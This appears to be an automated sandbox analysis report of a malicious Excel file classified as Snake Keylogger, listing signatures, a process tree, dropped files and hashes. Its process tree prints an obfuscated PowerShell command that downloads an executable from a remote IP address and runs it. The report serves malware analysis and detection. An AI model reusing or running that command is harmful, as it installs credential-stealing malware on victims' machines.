Analysis

  • max time kernel
    118s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    02-10-2024 01:34

General

  • Target

    c041864b59bbcc3ffb518337b77a636aa23967f552ec712ffebc25df56f399f1.xls

  • Size

    866KB

  • MD5

    b74b9f77a4f538ff131c1be7ed01414f

  • SHA1

    25dac77c5cf517d87da4e2b936a294b88c73185d

  • SHA256

    c041864b59bbcc3ffb518337b77a636aa23967f552ec712ffebc25df56f399f1

  • SHA512

    19b80ce89cef0288e95081dab9da47df5afc20a958159cd9ac9f96177fb0e249ee713524f703109b3effaf1f48a28251187fd6b0c2eb59d4be870d0eb53932c7

  • SSDEEP

    24576:2VgVPjrLE7wRtMk8gwYRJBeMgBDDb/7zpkH/6:2yjXE7wRKzERJTgBXbm

Malware Config

Extracted

Family

snakekeylogger

Credentials

Signatures

  • Snake Keylogger

    Keylogger and Infostealer first seen in November 2020.

  • Snake Keylogger payload 3 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file
  • Evasion via Device Credential Deployment 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\c041864b59bbcc3ffb518337b77a636aa23967f552ec712ffebc25df56f399f1.xls
    1⤵
    • System Location Discovery: System Language Discovery
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:2672
  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe -Embedding
    1⤵
    • Blocklisted process makes network request
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2736
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" "/C POWERsheLl -eX bYPASs -NOp -w 1 -c DEViceCReDenTIalDEPlOYmEnT.EXE ; iEX($(iEx('[SYsteM.TExt.EncOdINg]'+[CHar]0x3A+[CHAr]0x3A+'utF8.GEtstrInG([sySteM.cOnVERT]'+[cHAr]0X3A+[char]58+'FROMBaSE64STRinG('+[char]34+'JHlXZHp3VklSYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1CRXJERWZJTkl0SU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFqVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBSZVFJLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1WLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrSndka0tHYWJ4LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhjZmRoKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVHhuIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0Y3QgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHlXZHp3VklSYTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzUwL3Rhc2tob3N0dy5leGUiLCIkZW5WOkFQUERBVEFcdGFza2hvc3R3LmV4ZSIsMCwwKTtTdEFSdC1TTGVFUCgzKTtzVEFyVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcdGFza2hvc3R3LmV4ZSI='+[Char]34+'))')))"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2588
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        POWERsheLl -eX bYPASs -NOp -w 1 -c DEViceCReDenTIalDEPlOYmEnT.EXE ; iEX($(iEx('[SYsteM.TExt.EncOdINg]'+[CHar]0x3A+[CHAr]0x3A+'utF8.GEtstrInG([sySteM.cOnVERT]'+[cHAr]0X3A+[char]58+'FROMBaSE64STRinG('+[char]34+'JHlXZHp3VklSYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1CRXJERWZJTkl0SU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFqVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBSZVFJLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1WLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrSndka0tHYWJ4LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhjZmRoKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVHhuIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0Y3QgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHlXZHp3VklSYTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzUwL3Rhc2tob3N0dy5leGUiLCIkZW5WOkFQUERBVEFcdGFza2hvc3R3LmV4ZSIsMCwwKTtTdEFSdC1TTGVFUCgzKTtzVEFyVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcdGFza2hvc3R3LmV4ZSI='+[Char]34+'))')))"
        3⤵
        • Blocklisted process makes network request
        • Evasion via Device Credential Deployment
        • Loads dropped DLL
        • Drops file in System32 directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2660
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ref_mcni.cmdline"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:692
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
            C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC0C1.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCC0C0.tmp"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:1096
        • C:\Users\Admin\AppData\Roaming\taskhostw.exe
          "C:\Users\Admin\AppData\Roaming\taskhostw.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of WriteProcessMemory
          PID:316
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            "C:\Users\Admin\AppData\Roaming\taskhostw.exe"
            5⤵
            • Accesses Microsoft Outlook profiles
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • outlook_office_path
            • outlook_win_path
            PID:2020

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

    Filesize

    1KB

    MD5

    7fb5fa1534dcf77f2125b2403b30a0ee

    SHA1

    365d96812a69ac0a4611ea4b70a3f306576cc3ea

    SHA256

    33a39e9ec2133230533a686ec43760026e014a3828c703707acbc150fe40fd6f

    SHA512

    a9279fd60505a1bfeef6fb07834cad0fd5be02fd405573fc1a5f59b991e9f88f5e81c32fe910f69bdc6585e71f02559895149eaf49c25b8ff955459fd60c0d2e

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

    Filesize

    436B

    MD5

    971c514f84bba0785f80aa1c23edfd79

    SHA1

    732acea710a87530c6b08ecdf32a110d254a54c8

    SHA256

    f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895

    SHA512

    43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

    Filesize

    174B

    MD5

    3539846159a1fc99b3f14f5e5e1393b8

    SHA1

    a021c8dda53a5f3c6889e17fe84c0352b2855bdc

    SHA256

    9c419f7da335d9a35b69f7e5300f61bc6bc7a2ad446b7fe85b87e60c0d41d31a

    SHA512

    00fd91ef44a5c34be1e8d5383587d9c55900b2666232e0f249c3c7b00340983d0ece7786f577f72229f20b30bf7e658a6758b94369222735c7b31c5a1081f8f1

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

    Filesize

    170B

    MD5

    00c3866ab7170f3a5db77fccb5c3f119

    SHA1

    13e6057355aa1da76d9536b5c56a70bae79568be

    SHA256

    0f5857b025a0a33bac0512e86467be41ad90291f5a4209e6018a73127f26c4ee

    SHA512

    cceb4db16207b8960e947e93a0b937101fceef7f45aef7ef5303e5a2f89b79d15d5cd667b51a36ea5f21e6c0cec2c79c08d122abb09a2fc9e7d53f7bd3eb8f2a

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\M4TQDAHL\niceworkwitheverybody[1].hta

    Filesize

    8KB

    MD5

    46f7566c298cdc31ac0c0f7c7800d02e

    SHA1

    7ccaa47baaec50720f0f6cbccfff28947eee0d59

    SHA256

    4ac90b298cf34de897cee2147b6f3feb9236afdaa085f45c8d43dfdbf154a492

    SHA512

    53b97bd148afe1d3eda168418f0abcc75a7213b5339d1f481335d025a1cf7a84205b456e5bf7cf87bfd29bb12baf4c780274e4a7be3b8ba92eaa2e3ad4fea285

  • C:\Users\Admin\AppData\Local\Temp\CabB7DA.tmp

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Admin\AppData\Local\Temp\RESC0C1.tmp

    Filesize

    1KB

    MD5

    b54130189d874f1b4547af683d4306ad

    SHA1

    60e88557317f93f943effefea96e71e8d174a785

    SHA256

    e264480be0cdce96bec1d0beac87b912afb0031b71049b970f4953536a7d21e9

    SHA512

    b60bb7cdd85321e943c08e2637be14a867eb73a0f09cf585221130d78fb055f05c9aa3621954b6d862e555996e007813bf0b3f78f7f235b218495f50970ef9bc

  • C:\Users\Admin\AppData\Local\Temp\ref_mcni.dll

    Filesize

    3KB

    MD5

    1f7bacc0e0861b18d2c9aca7d5d58376

    SHA1

    88bd4b451de5685e001f75e2e13c6ca23404f0df

    SHA256

    9a0743510144459cbbc84e402ea0705e6a0ebff6fc46e59b7b70976ac62abcee

    SHA512

    871660acb46ede4e7f915998ba81a6d88c28039ae13215bb1026f0a4b054f38191bf04a64706b190e52cd30f4d7541f47df0a504ee9b62cc7bbc572cb4138327

  • C:\Users\Admin\AppData\Local\Temp\ref_mcni.pdb

    Filesize

    7KB

    MD5

    1a0d601426b73e123fa9b7a76738a4b5

    SHA1

    a4c1edd3f02b62bd1f8ec4dbc871b329de27146d

    SHA256

    e09bfc47665b668437b07a49e8338cbcd695bbc8a109dae9547b6565d6e7cc16

    SHA512

    121aa4cfe145e1264f3f2e3157ca3b3907b66c17b1f6994c82d22f9c93202c414a5e7ef2f0144a52236a9d522facfb8e4ff9e0b5ae5d3423bd1ed518cfed40ae

  • C:\Users\Admin\AppData\Roaming\taskhostw.exe

    Filesize

    927KB

    MD5

    72489275d4647bac97371516cc034a56

    SHA1

    154f42f5b5b2dee0407813f4b86ebc3b75313e89

    SHA256

    2ef8baaa2ea5cbf4bc00e9435c8191b1e57470a021819314692c9a13f26e5e82

    SHA512

    18dd73769d62999c7cd408377ca374b0df71a59703f810ead593ea37c49280c4b1f03b0192371aef4750dba60a25b26e2dcf44024ec13bf520e83740d904fc6c

  • \??\c:\Users\Admin\AppData\Local\Temp\CSCC0C0.tmp

    Filesize

    652B

    MD5

    3435d13f568291c9097e8acd43ad5117

    SHA1

    86de87e8de6283b0c76cd42b6bd2f2a36eff2bcf

    SHA256

    33674f508e84d1a3b3530a6f1db79d14b63c9e275b040912683b034514611538

    SHA512

    c55e8493a7972bfd19cfe045ceec9845b3137ee7ef97c5491c8492428c2a6eb81803adf7b51a4fd07e3868422ffb4dcdc428813b39ad1510d2c0b28207701b5f

  • \??\c:\Users\Admin\AppData\Local\Temp\ref_mcni.0.cs

    Filesize

    463B

    MD5

    26586cfd3feae7a8042b855cf878e0b2

    SHA1

    fd8d93697c49047ddbcaaee8475061a4894a3906

    SHA256

    0374876ae0666d1d4296d2d500351e292b0ec565b31aac339abf1c551b2a26bd

    SHA512

    942f19de8f09985f9f39724b270bca2fe2c29b96ff1cf4db9fdb961321b3442b5266aaa437ed3f87c94e60e7c7f6f84b3bee4bd810284800cde7d53cbf6a84c6

  • \??\c:\Users\Admin\AppData\Local\Temp\ref_mcni.cmdline

    Filesize

    309B

    MD5

    429c9659c58e0a6e86a6dacfb3b91ea4

    SHA1

    ad2a6486f640d5053f3e2bab416a85e5b2f2cee9

    SHA256

    5457f57641747d970b611d40a186e66975251510be23d229b6766d54225dd0a7

    SHA512

    c2581d04525a02d3acaa1ce751ab6165b59688fcfb2678ec5e25c92d961ab762c554e74809710eebfd2930280b927b82f4aa12667e66e785db65a409671d9eda

  • memory/2020-64-0x0000000000400000-0x0000000000426000-memory.dmp

    Filesize

    152KB

  • memory/2020-65-0x0000000000400000-0x0000000000426000-memory.dmp

    Filesize

    152KB

  • memory/2020-66-0x0000000000400000-0x0000000000426000-memory.dmp

    Filesize

    152KB

  • memory/2672-17-0x0000000002D40000-0x0000000002D42000-memory.dmp

    Filesize

    8KB

  • memory/2672-1-0x0000000073CED000-0x0000000073CF8000-memory.dmp

    Filesize

    44KB

  • memory/2672-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/2672-55-0x0000000073CED000-0x0000000073CF8000-memory.dmp

    Filesize

    44KB

  • memory/2736-16-0x0000000000960000-0x0000000000962000-memory.dmp

    Filesize

    8KB